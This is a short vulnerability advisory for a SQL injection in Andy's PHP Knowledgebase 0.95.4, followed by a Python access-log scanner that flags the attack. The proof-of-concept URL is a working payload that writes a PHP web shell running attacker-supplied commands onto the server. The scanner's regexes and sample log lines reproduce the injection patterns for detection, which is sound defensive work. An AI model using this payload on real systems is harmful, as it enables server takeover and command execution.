
Andy's PHP Knowledgebase Project 0.95.4 SQL Injection

Description

A SQL injection vulnerability in the pdfa parameter of plugins/pdfClasses/pdfgen.php can be used to extract arbitrary data. In some environments it may be possible to create a PHP shell.

Proof Of Concept

localhost/aphpkb/plugins/pdfClasses/pdfgen.php?pdfa='and%201=0%20UNION%20SELECT%20'<?php%20system($_GET["CMD"]);%20?>',''%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23
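
One way to look for this request in web server access logs (an added example, not part of the original advisory): the script flags requests to pdfgen.php whose decoded pdfa value contains SQL fragments such as UNION SELECT or INTO OUTFILE. The log lines are constructed, and the rule set assumes that legitimate pdfa values are plain identifiers.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Endpoint as it appears in the advisory's proof of concept (lower-cased).
TARGET_PATH = "/plugins/pdfclasses/pdfgen.php"

# Assumption: legitimate pdfa values are plain identifiers, so any of these
# SQL fragments in the decoded value marks the request for review.
RULES = {
    "quote": re.compile(r"['\"]"),
    "union_select": re.compile(r"\bunion\b.+\bselect\b", re.I | re.S),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "comment": re.compile(r"#|--\s|/\*"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PARAM_RE = re.compile(r"(?:^|&)pdfa=([^&]*)", re.I)

def scan_line(line):
    """Return the sorted rule names hit by pdfa in one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group(1))
    if not parts.path.lower().endswith(TARGET_PATH):
        return []
    hits = set()
    for raw in PARAM_RE.findall(parts.query):
        value = unquote_plus(raw)  # undo percent-encoding before matching
        hits.update(name for name, rx in RULES.items() if rx.search(value))
    return sorted(hits)

def scan_log(lines):
    """Return (line_number, rule_names) for every flagged request."""
    flagged = []
    for number, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            flagged.append((number, hits))
    return flagged

# Constructed sample lines (Common Log Format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2018:10:00:00 +0000] "GET /aphpkb/plugins/pdfClasses/pdfgen.php?pdfa=12 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2018:10:02:11 +0000] "GET /aphpkb/plugins/pdfClasses/pdfgen.php?pdfa=%27and%201=0%20UNION%20SELECT%20%27x%27,%27%27%20FROM%20dual%20INTO%20OUTFILE%20%27PLACEHOLDER%27%3B%23 HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2018:10:03:00 +0000] "GET /aphpkb/index.php?q=union%20select HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

Access logs record only the query string, so a value sent in a POST body is not visible to this check without request-body logging.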


Copyright © 2018 AutoSec Tools LLC